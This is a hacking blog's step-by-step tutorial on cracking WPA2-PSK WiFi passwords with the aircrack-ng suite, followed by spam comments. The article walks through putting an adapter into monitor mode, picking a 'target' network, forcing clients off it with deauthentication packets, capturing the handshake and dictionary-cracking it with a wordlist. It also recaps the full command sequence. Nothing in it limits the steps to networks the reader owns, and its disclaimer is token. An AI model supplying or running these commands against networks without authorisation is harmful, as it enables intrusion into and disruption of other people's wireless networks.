img

Hack WPA2-PSK WiFi Password Using Linux

/
/
/
1380 Views

WiFi is getting so much essential as days are passing but WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase and that’s sometimes also called Dictionary Attack. So Let’s see How to Hack WPA2-PSK WiFi Password Using Linux.

Cracking WPA2 wifi password is not really an easy task to do, you can’t crack it with a mouseclick as they show in movies and there is no software that will give you the password without some hard work but you don’t worry HACKAGON can show you how to crack it with few easy steps and we will do it using aircrack-ng.

Hack WPA2-PSK WiFi Password Using Linux Hackagon

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that’s very difficult to crack—but not impossible.

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Requirements: To Hack WPA2-PSK WiFi Password Using Linux

  1. Kali Linux or any Pentesting Linux Distros with aircrack-ng installed in it. if you don’t have aircrack-ng suite get it by this command in terminal sudo apt-get install aircrack-ng
  2. A Wireless Network Adapter that support monitor mode like Alfa 2W AWUS036NH, Alfa AWUS036H, wifiy-city 56G, or you can check this page here for card compatibility by clicking on >> Compatibility Drivers.
  3. A wordlist comprising of all the possible different combination of pass-phrases.

Let’s See How To Hack WPA2-PSK WiFi Password Using Linux

1) open up your Root Terminal as root and type ifconfig this will show you all the networking interfaces connected to your device.

ifconfig Hackagon

if your wireless network adapter is working fine you should see the “wlan0” the name may change if you have more than one connected wireless adapter.

2) Now to start monitor mode type airmon-ng start wlan0.

airmon-ng is a traffic monitoring tool.
wlan0 is your Wireless Interface.

After this command, It’ll start the monitor mode.

airmon-ng Hackagon

As it’s seen the monitor mode is working under “wlan0mon“, So this is your card name for now.

We can see there is a list of Process ID’s (PID) and that will cause trouble during the process so we’ll kill those processes by typing “kill <pid>” in my case, it is “kill 1210 1341 1591 1592“.

kill terminal command hackagon

3) To show the list of available WiFi Network Type airodump-ng wlan0mon.

airodump-ng is a WiFi Packet Capturing Tool.
wlan0mon is my Monitoring Interface.

airodump-ng Hackagon

airodump-ng will start capturing all packets.

airodump-ng captured packets hackagon

From the captured packets select your target and note its ‘BSSID‘ (BSSID = Base Service Set Identifier) and ‘Channel‘. Then stop the capture using “ctrl+c“.

4) Start capturing the packets of your target network by typing airodump-ng -c -w –bssid wlan0mon and in my case, it is airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon.

Captured WiFi Packets Hackagon

This will start capturing the packets and if you get the handshake then you won’t need the aireplay-ng command but in case if you don’t get the handshake while capturing of packets goes on, open a new terminal as root and type aireplay-ng -0 0 -a mon0.

aireplay-ng => Tool for Deauthentication, Fake Authentication, and Other Packet Injections.
-0 => Number Associated for Deauthentication.
0 => Deauth Count.
-a => bssid here we are trying to send a deauthentication request.
In my case, the command looks like aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon.

aireplay-ng deauth hackagon

After few seconds stop it using ‘Ctrl+c‘.
Now after we have successfully captured the WPA handshake it’ll look like:

WPA Handshake Hackagon

5) Stop the capture using ‘Ctrl+c‘ and type ‘ls‘ that would bring up all the current directories and files.

WiFi Captured Files Hackagon

Now, Select the file with ‘.cap‘ extension and type aircrack-ng -w
aircrack-ng=> Tool that helps in cracking the password.
In my case, the command looks like aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’.

aircrack-ng hackagon

Now it starts finding suitable passphrase.

WPA2 Passphrase Hackagon

And now all you have to do is to wait till you see the lovely news (KEY Found).

Summing Up All Step in few lines:

  1. ifconfig
  2. airmon-ng start wlan0
  3. airodump-ng wlan0mon
  4. airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon
  5. aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon
  6. aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.

  • Facebook
  • Twitter
  • Google+
  • Linkedin
  • Pinterest

60 Comments

  1. you’re actually a good webmaster. The website loading speed
    is incredible. It sort of feels that you are doing any unique trick.
    In addition, The contents are masterwork. you’ve performed a wonderful task in this topic!

  2. Please let me know if you’re looking for a article writer
    for your blog. You have some really good posts and I think I would be a good asset.
    If you ever want to take some of the load off, I’d love to write some material for
    your blog in exchange for a link back to mine.
    Please blast me an email if interested. Regards!

    • HACKAGON appreciate their readers articles if they have an interesting and unique one.
      Readers can contact with their valuable articles at Contact Page or they can mail us to founder@hackagon.com.
      HACKAGON will return the favour with the reverse link to your WEBSITE, BLOG, FACEBOOK, TWITTER, LINKEDIN or where ever you want.

  3. Hello Dear, are you really visiting this web site
    on a regular basis, if so then you will without doubt obtain good know-how.

  4. Do you mind if I quote a couple of your articles as long as I provide credit and
    sources back to your webpage? My blog is in the exact same
    niche as yours and my users would certainly benefit from some of the information you provide here.

    Please let me know if this ok with you. Thank you!

  5. I was just looking at your Hack WPA2-PSK WiFi Password Using Linux – HACKAGON site and see that your site has the potential to become very popular. I just want to tell you, In case you didn’t already know… There is a website network which already has more than 16 million users, and the majority of the users are interested in websites like yours. By getting your website on this network you have a chance to get your site more popular than you can imagine.

  6. This web site is really a walk-through for all of the info you wanted about this and didn’t know who to ask. Glimpse here, and you’ll definitely discover it.

  7. continuously i utilized to read smaller articles which also clear their motive, and that is certainly also happening using this post that i am reading now.

  8. The crux of your writing while appearing agreeable originally, did not really settle well with me personally after some time. Someplace within the sentences you managed to make me a believer unfortunately only for a short while. I still have a problem with your jumps in logic and one would do well to fill in those gaps. When you can accomplish that, I will surely be amazed.

  9. This design is steller! You certainly realize how to keep a reader amused.
    Between your wit as well as your videos, I used to be almost transferred to start my own, personal blog (well, almost…HaHa!)
    Excellent job. I seriously enjoyed the things you had to say,
    and more than that, the way you presented it. Too cool!

  10. Wow that was odd. I just wrote an incredibly long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say fantastic blog!

    • Hello Janell Fross, Thanks for complimenting and We’re really sorry that you lost your long written comment but I must tell you that we approve comments before it goes public so that our reader’s shouldn’t face spamming issues at HACKAGON.

      Hope you’ve got a good experience at HACKAGON.
      Visit Again.

  11. This criterion is chosen by insurance business as it suggests the
    lock has been tested versus popular sorts of attack for a certain amount
    of time.

  12. Superb blog you have here but I was curious if you knew
    of any message boards that cover the same topics discussed here?
    I’d really like to be a part of group where I can get opinions from other knowledgeable
    individuals that share the same interest. If you have any suggestions, please let me know.
    Thanks!

  13. Hi there! I could have sworn I’ve been to this web site
    before but after looking at many of the articles I realized it’s new to me.
    Regardless, I’m definitely pleased I came across it and
    I’ll be book-marking it and checking back
    often!

  14. Wow, that’s what I was searching for, what a material!
    present here at this blog, thanks admin of this site.

Leave a Reply to bastcilkdoptb Cancel reply

It is main inner container footer text